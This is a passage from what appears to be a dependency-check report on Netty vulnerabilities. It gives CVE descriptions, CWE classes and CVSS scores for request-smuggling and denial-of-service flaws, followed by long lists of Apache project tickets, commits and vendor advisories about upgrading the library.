- REDHAT - RHSA-2020:0811
- UBUNTU - USN-4532-1
Vulnerable Software & Versions:
CVE-2019-16869
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
References:
- [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444)
- [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5
- [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15418) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 for Cassendra 2.2.5
- [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities
- [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6
- [cassandra-commits] 20210526 [jira] [Created] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty
- [cassandra-commits] 20210526 [jira] [Updated] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty
- [cassandra-commits] 20210924 [jira] [Commented] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5
- [cassandra-commits] 20210924 [jira] [Updated] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5
- [drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities
- [drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities
- [drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities
- [druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities
- [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444
- [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink
- [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink
- [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869
- [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869
- [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869
- [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,
- [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869
- [olingo-dev] 20191206 [jira] [Assigned] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty
- [olingo-dev] 20191206 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty
- [olingo-dev] 20191206 [jira] [Created] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty
- [olingo-dev] 20191206 [jira] [Resolved] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty
- [olingo-dev] 20191206 [jira] [Updated] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty
- [olingo-dev] 20191209 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty
- [olingo-dev] 20191227 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty
- [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list
- [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444
- [rocketmq-dev] 20201224 [GitHub] [rocketmq] codecov-io commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020
- [rocketmq-dev] 20201224 [GitHub] [rocketmq] coveralls commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020
- [rocketmq-dev] 20201224 [GitHub] [rocketmq] crazywen opened a new pull request #2517: fix CVE-2019-16869, CVE-2018-8020
- [spark-issues] 20191219 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869
- [spark-issues] 20191219 [jira] [Created] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869
- [spark-issues] 20191219 [jira] [Updated] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869
- [spark-issues] 20191220 [jira] [Comment Edited] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869
- [spark-issues] 20191220 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869
- [spark-issues] 20191220 [jira] [Issue Comment Deleted] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869
- [spark-issues] 20191220 [jira] [Reopened] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869
- [spark-issues] 20191220 [jira] [Resolved] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869
- [tinkerpop-commits] 20191022 [tinkerpop] branch tp34 updated: Bump to Netty 4.1.42 fixes CVE-2019-16869 - CTR
- [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869
- [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5.6 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869
- [zookeeper-commits] 20191003 [zookeeper] branch master updated: ZOOKEEPER-3563: Update Netty to address CVE-2019-16869
- [zookeeper-dev] 20190930 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2
- [zookeeper-dev] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869
- [zookeeper-dev] 20191001 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2
- [zookeeper-dev] 20191002 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2
- [zookeeper-issues] 20190930 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty
- [zookeeper-issues] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869
- [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty
- [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty with CVE-2019-16869
- [zookeeper-issues] 20191001 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty
- [zookeeper-issues] 20191003 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty
- [zookeeper-issues] 20191008 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty
- [zookeeper-issues] 20191008 [jira] [Resolved] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty
- BUGTRAQ - 20200105 [SECURITY] [DSA 4597-1] netty security update
- DEBIAN - DSA-4597
- MISC - https://github.com/netty/netty/compare/netty-4.1.41.Final...netty-4.1.42.Final
- MISC - https://github.com/netty/netty/issues/9571
- MLIST - [debian-lts-announce] 20190930 [SECURITY] [DLA 1941-1] netty security update
- MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update
- MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update
- OSSINDEX - [CVE-2019-16869] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
- OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16869
- OSSIndex - https://github.com/netty/netty/issues/9571
- REDHAT - RHSA-2019:3892
- REDHAT - RHSA-2019:3901
- REDHAT - RHSA-2020:0159
- REDHAT - RHSA-2020:0160
- REDHAT - RHSA-2020:0161
- REDHAT - RHSA-2020:0164
- REDHAT - RHSA-2020:0445
- UBUNTU - USN-4532-1
Vulnerable Software & Versions:
CVE-2020-11612
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-37136
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-37137
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2022-41881
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-43797
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forwards these to another remote system when used as a proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2023-34462
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2021-21295
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec` and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final. As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final
- [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx
- [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48)
- [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295
- [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022
- [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295
- [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60
- [pulsar-commits] 20210329 [GitHub] [pulsar] aahmed-se opened a new pull request #10073: Upgrade Netty version to 4.1.60.final
- [pulsar-commits] 20210329 [GitHub] [pulsar] merlimat closed issue #10071: CVE-2021-21295 & CVE-2021-21290
- [pulsar-commits] 20210329 [GitHub] [pulsar] yaswanthnadella opened a new issue #10071: CVE-2021-21295 & CVE-2021-21290
- [pulsar-commits] 20211020 [GitHub] [pulsar] Shoothzj opened a new pull request #12437: [Security] Bump grpc to 1.41.0
- [ranger-dev] 20210317 [jira] [Assigned] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295
- [ranger-dev] 20210317 [jira] [Created] (RANGER-3209) Upgrade netty to 4.1.60+ due to CVE-2021-21290 and CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-4272 ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.6 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch branch-3.7 updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-commits] 20210331 [zookeeper] branch master updated: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-dev] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-dev] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210330 [jira] [Created] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210330 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Assigned] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Resolved] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210331 [jira] [Updated] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210401 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210402 [jira] [Commented] (ZOOKEEPER-4272) Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-issues] 20210928 [jira] [Created] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, - Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 , CVE-2021-28163, CVE-2021-34428- Upgrade jetty to 9.4.42
- [zookeeper-issues] 20210928 [jira] [Updated] (ZOOKEEPER-4390) CVE-2021-28169 - Upgrade jetty to 9.4.42
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad closed pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] arshadmohammad commented on pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] asfgit closed pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] ayushmantri opened a new pull request #1670: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- [zookeeper-notifications] 20210331 [GitHub] [zookeeper] eolivelli commented on pull request #1669: ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295
- https://lists.apache.org/thread.html/r04a3e0d9f53421fb946c60cc54762b7151dc692eb4e39970a7579052%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r16c4b55ac82be72f28adad4f8061477e5f978199d5725691dcc82c24%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de%40%3Cnotifications.zookeeper.apache.org%3E
- https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468%40%3Ccommits.servicecomb.apache.org%3E
- https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60%40%3Ccommits.servicecomb.apache.org%3E
- CONFIRM - https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj
- CONFIRM - https://security.netapp.com/advisory/ntap-20210604-0003/
- DEBIAN - DSA-4885
- MISC - https://github.com/Netflix/zuul/pull/980
